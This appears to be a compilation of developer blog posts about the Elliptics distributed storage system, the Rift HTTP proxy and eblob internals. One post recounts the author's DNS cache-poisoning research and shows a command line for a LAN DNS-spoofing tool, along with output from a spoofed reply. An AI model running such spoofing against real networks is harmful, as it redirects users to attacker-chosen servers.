Reverbrain is a company we started to provide support and solutions for distributed storage and realtime computation problems.
We created the whole stack of technologies ranging from the lowest level of data storage upto high-level processing pipeline.
Time moves on and we see how complex is to deal with massively increasing amounts of data. We provide solutions for true-way horizontal scaling with fair system complexity. Our storage appliances lay in the area where one has to host billions of small-to-medium objects upto huge data streaming systems.
Your data should nost just lay in archive in the distributed system — realtime pipeline processing is our vision of how data has to be handled. We use them by ourself and want to provide the best experience for our customers.
I separated elliptics HTTP proxy from our high-performance server HTTP framework TheVoid. TheVoid continues to be a framework for writing HTTP servers in C++, whlist Rift becomes elliptics HTTP access point.
Rift support usual object upload/get/removal as well as upload/download flow control. The latter (soon will be default and the only possible mode) is basically an arbiter who doesn’t allow to read more data from client if current chunk hasn’t been yet written. It uses chunked upload and download. Rift supports range request (Range: HTTP header).
There is basic authentification support in the Rift. I will extend it to be per-bucket fashion similar to what Amazon S3 has (not the same API though). Rift also support multiple-groups caching, this is extremely useful for bigger content, when you suddenly decided that given objects has to be spread into many groups instead of just those originally written into. There is ‘a button’ (basically a python script) which copies given keys from theirs original groups into caching and broadcasts updates to all Rift proxies via updating special keys which are periodically checked by the proxies. Caching can be turned on and off on per-key basis.
One can create spacial SSD caching groups for example and put the needed files for some time. Or those can be commodity spinning disks for larger files like video content.
More details on this later at documentation site.
Everything above and several new features will be available both in Rift proxies and our new cluster we currently develop. Not that it will be plain Amazon S3, but something similar. More details later this year :)
5 years ago I stumbled upon theoretical vulnerability in DNS protocol found by Dan Kaminsky – getting that one can guess DNS query ID and source port there is possibility to send properly crafted packet and inject malicious DNS entry into client’s environment. Basically, client would ask ‘www.paypal.com’ address and instead receive a reply with properly crafted hacker’s server address.
It was claimed by ISC BIND – the most popular DNS server – that they do not have that vulnerability. I love such things, so I spent a week or so developing software which could poison BIND’s cache with malicious records. I succeeded and got New York Times article as a reward. ISC BIND fixed the issue since then – well, it is still possible to poison remote DNS cache, but requires more resources.
About resources – I created distributed attack system, which contained multiple servers which turned on one after another if admins banned or turned off current node. Next day I was fucked for running this crap in office network. In the sandbox attack required 1Gb/s of free bandwidth to DNS server and several minutes to succeed. People from Slashdot said that this attack is unfeasible in a real life. Heh, I saw 110 Gb/s DDOS to our production systems, so 1 Gb/s is quite commodity today if you have several hundreds-to-thousands of dollars for the appropriate botnet.
But is it possible to craft such attack more quietly? I thought it is possible.
3 days ago I found DNScurve article that claimed DNS requests are actually being sent via ethernet broadcast in LAN. My fault, I didn’t check this – this is actually wrong, at least I didn’t see such networks. But if this could be true, it is quite interesting to implement this attack vector.
So, I spent 3 nights to hack up a tool to poison DNS cache in LAN. It listens for DNS requests, searches domain name regex and sends properly crafted (but rather simple) poisoned reply back to client.
Here is how it works:
$ sudo ./dpoison --device enp0s20u2u3 udp and dst port 53 --query ".*\.reverbrain\.com" --A "220.127.116.11"
$ dig @18.104.22.168 www.reverbrain.com
;; Warning: query response not set
; <<>> DiG 9.9.3-rl.13207.22-P2-RedHat-9.9.3-5.P2.fc19 <<>> @22.214.171.124 www.reverbrain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22647
;; flags: rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;www.reverbrain.com. IN A
;; ANSWER SECTION:
www.reverbrain.com. 100 IN A 126.96.36.199
;; Query time: 1 msec
;; SERVER: 188.8.131.52#53(184.108.40.206)
;; WHEN: Thu Nov 14 22:34:39 MSK 2013
;; MSG SIZE rcvd: 70
Too good it doesn’t work in real life. Or it could (like over the air?) :)
Eblob is a main low-level storage supported in elliptics. It was created as append-only base, but eventually we added rewrite, data sorting, in-memory and on-disk indexes, added and then removed columns, bloom-filters, iterators, blob merge and defragmentation and so on and so on.
Eblob has rather simple interfaces accessible from C, C++ and Python.
So, we documented our most actively used low-level storage from every point of view: design and architecture, interfaces, known features, gotchas and best practices.
It is generally a good idea to read how things are done at the lowest level to understand how whole system behaves, so I present eblob documentation link here: http://doc.reverbrain.com/eblob:eblob
I’ve just accepted commit by Ruslan Nigmatullin which fixes 31-bits integer overflow in atomic counters used as transaction ID.
This basically means that we have clients each of which has sent us more than 2 billions requests without restart or disconnect – impressive clients!
So, Docker‘s repository supports storing its layered ‘filesystem’ in Elliptics. With its automagic recovery, replication into multiple datacenters (all around the world), scalability and so on and so on
Now you can safely distribute your VM images over Elliptics.
It describes how cache is organized, how one can use it to speed up disk operations or just to store data in memory only.
Some non-trivial cases are also touched: how to organize cache for append writes and partial updates as well as various corner cases.
Although I removed the highest indirection level – the one where key indexes can live on separate servers, I only left in-memory and on-disk indexes.
That’s probably why Elliptics largest by number of keys storage hosts only 50+ billions (counting all 3 copies though) of objects. And that’s actually less than hundred of nodes (including all 3 replicas).
Hi, this is rbtz speaking again. I’m the engineer responsible for eblob codebase for
almost a year now. Here is small recap of what was happening with eblob
since v0.17.2 with some commit highlights.
* Eblob now builds under Mac OS X. This improved experience of developers with Macs.
* Changed most links to point to newly created http://reverbrain.com.
* Added comments to all eblob subsystems: e254fc3. This improves learning curve of new developers.
* Added l2hash support: c8fa62c. This reduces memory consumption of elliptics metadata .by 25% on LP64.
* Added first edition of eblob stress test. Year after it’s responsible for catching 99% bugs that otherwise would go to testing: 8eab8ed.
* Added config variables for index block and bloom: a106d9d. This allows sysadmins to limit memory occupied by bloom filter.
* Added config variable to limit total blob size: f7da001. This allows sysadmins to limit eblobs size in case many databases are located on one shared drive.
* Reduce memory consumption of “unsorted” blobs by 20% on LP64: 19e8612
* First static analyzer crusade (feat. clang static analyzer) – number of “almost impossible to spot” bugs found.
* Added data-sort and binlog v1. This allows “on the fly” eblob defragmtntation and memory cleanups.
* Added travis-ci tests after each commit: f08fea2.
* Removed custom in-memory cache in favor of OS page cache: a7e74a7; This removed number of nasty races in eblob code and also opened way for some future optimizations.
* Added Doxyfile stub, so that in future libeblob man pages may be autogenerated: aac9cb3.
* Decreased memory consumption of in-memory data structures by 10% on LP64: c6afffa.
* Replaced core mutexes with rwlocks; This improves out Intel vTune concurrency benchmarks, along with our QA tests.
* Second static analyzer crusade (feat. Coverity);
* Switched to <a href=”https://en.wikipedia.org/wiki/Spinlock#Alternatives”>adaptive mutexes</a> when available: 43b35d8.
* Speeded up statistics update v1: 40a60d7. Do not hold global lock while computing and writing stats to disk.
* Rewritten bloom filter v1: 6f08e07. This improves speed and reduces memory fragmentation.
* Allocate index blocks in one big chunk instead of millions of small, thus speeding up initialization and reducing memory fragmentation: b87e273.
* Do not hold global lock for the whole duration of sync(): 6f6be68. This removes “stalls” in configs where
sync > 0.
* Switched to POSIX.1-2008 + XSI extensions: 6ece045.
* Build with -Wextra and -Wall by default: 0e8c713. This should in long term substantially improve code quality.
* Added options to build with hardening and sanitizers: c8b8a34, 2d8a42c. This improves our internal automated tests.
* Do not set bloom filter bits on start on removed entries: 36e7750. This will improve lookup times of “long removed” but still not defragmentated entries.
* Added separate thread for small periodic tasks: ea17fc0. This in future can be upgraded to simple background task manager;
statvfs(3) to periodic thread which speeds up write-only micro benchmarks by 50%: f36ab9d.
* Lock database on init to prevent data corruption by simultanious accesses to the same database by different processes: 5e5039d. See more about EB0000 in kb article.
* Removed columns aka types: 6b1f173; This greatly simplifies code and as side effect improves elliptics memory usage and startup times;
* Removed compression: 35ac55f; This removes dependency on
bsize knob for write alignment: 8d87b32;
* Rewritten stats v2: 94c85ec; Now stats update very lightweight and atomic;
* Added writev(2)-like interface to eblob, so that elliptics backend could implement very efficient metadata handling: b9e0391;
* Replaced complex binlog with very tiny binlog v2: 1dde6f3; This greatly simplifies code, improves data-sort speed and memory efficiency;
* Made tests multithreaded: 1bd2f43. Now we can spot even more errors via automated tests before they hit staging.
* Move to
GNU99 standard: f65955a. It’s already 15 years old already =)
* Fixed very old bug with log mesage truncation/corruption on multithreaded workloads: 10b6d47.
* Bloom filter rewrite v2: 1bfadaf. Now we use many hash functions instead of one thus trading CPU time for improved IO efficiency. This improved bloom filter efficiency by order of magnitude.
* Merge small blobs into one on defrag: ace7ca7. This improves eblob performance on databases with high record rotation maintaining almost fixed number of blobs.
* Added record record validity check on start: bcdb0be; See more about database corruption EB0001 in kb article.
* More robust
eblob_merge tool that can be used to recover corrupted blobs.
* Reduced memory consumption of in-memory data-structures by 10% on LP64: e851820;
* Added schedule-based data-sort: 2f457b8; More on this topic in previous post: data-sort implications on eblob performance.
Here I’ve mentioned only most notable commits, mostly performance and memory usage oriented changes. There are of course lots of other stuff going on like bugfixes, minor usability improvements and some internal changes.
Here are some basic stats for this year:
Total commits: 1375
Stats total: 65 files changed, 8057 insertions(+), 4670 deletions(-)
Stats excl. docs, tests and ci: 39 files changed, 5368 insertions(+), 3782 deletions(-)
Also if you are interested in whats going to happen in near future in eblob world you should probably take a look into it’s roadmap.
By the way for those of you who is interested in numbers and pretty graphs – after recent upgrade of our internal elliptics cluster storing billions of records to new LTS releases of elliptics 2.24.X and eblob 0.22.X we’ve got:
Response time reduction (log scale):
Disk IO (linear scale):
Memory (linear scale):
In this post I want to dig a little bit deeper into one of eblob’s least
understood parts: record overwrite. Let’s start with notion how overwrite was
meant to work in eblob: it simply shouldn’t. Indeed eblob started as
append-only database, so no overwrites were allowed. Then overwrite was added
to reduce fragmentation for use cases when some records were continuously
overwritten so that appending them over and over again was inefficient. So
special case “overwrite-in-place” for same-or-smaller size records overwrite
was added: it was controllable via two knobs – one global for database called
EBLOB_TRY_OVERWRITE and second is per-write flag
BLOB_DISK_CTL_OVERWRITE. Both of them are now deprecated, let me
From this point on eblob became what I call “append-mostly” database, which
means usually it only appends data to the end of file, but in some rare cases it
can overwrite data “in-place”.
During binlog rewrite it was decided that having flags that drastically change
eblob write behavior is too complicated so those were replaced with the one
“canonical” write path: we are trying to overwrite records only if it’s overwrite of
same/smaller size and blob is not currently under data-sort. So we basically
EBLOB_TRY_OVERWRITE flag by default, which should greatly reduce
fragmentation on some workloads. There are possible performance implications of
that decision so we’ve done much testing before applying this change via our
As side effect it allowed us to remove 90% of binlog code since there is no need to
“log” data overwrites and keep track of their offsets in original blob to apply
them later to sorted one.
By the way we’ve considered three possible alternatives:
- Always append data to end of “opened” blob on overwrite. (True append only database)
- Overwrite in-place only in last blob. (Almost append only)
- Always overwrite in-place when blob is not under data-sort. (Append-mostly database)
Here are some graphs from our benchmark system
yandex-tank (Yay! It’s opensource).
10000 rps, 1kb records, eblob 0.21.16
Overwrite in last blob only:
We’ve picked “always overwrite in-place” because it behaves really well with
background data-sort – as you can see there is almost no noticeable difference
between graph with data-sort in
AUTO mode and disabled data-sort. One common
choice also simplifies write path and makes performance independent of
NB! Future eblob versions may change this behavior or reintroduce some of
knobs in case regressions of “always overwrite” approach be found.
I made a new presentation on Fedora’s Road to cloud tech conference.
Its all about safety – what problems can be found when developing and deploying distributed storage solutions, and how we solved them in Elliptics.
One can find an article (in Russian) for this presentation at http://ioremap.net/tmp/roadtocloud.txt